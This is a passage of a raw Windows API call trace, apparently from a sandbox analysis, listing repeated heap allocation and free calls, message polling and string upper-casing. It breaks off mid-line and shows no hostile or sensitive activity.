[0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0101.339] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0101.339] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0101.339] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0101.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0101.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0101.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0101.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0101.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0101.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0101.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0101.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74310 [0101.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ec8 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0101.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9cd0 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e98 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0101.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74310 | out: hHeap=0x2af0000) returned 1 [0101.342] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74598 | out: hHeap=0x2af0000) returned 1 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.342] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0101.342] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a744c0 [0101.342] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0101.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0101.342] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0101.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0101.343] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0101.343] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a744c0 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0101.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0101.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0101.344] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0101.344] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0101.344] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0101.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0101.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0101.345] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0101.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0101.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: 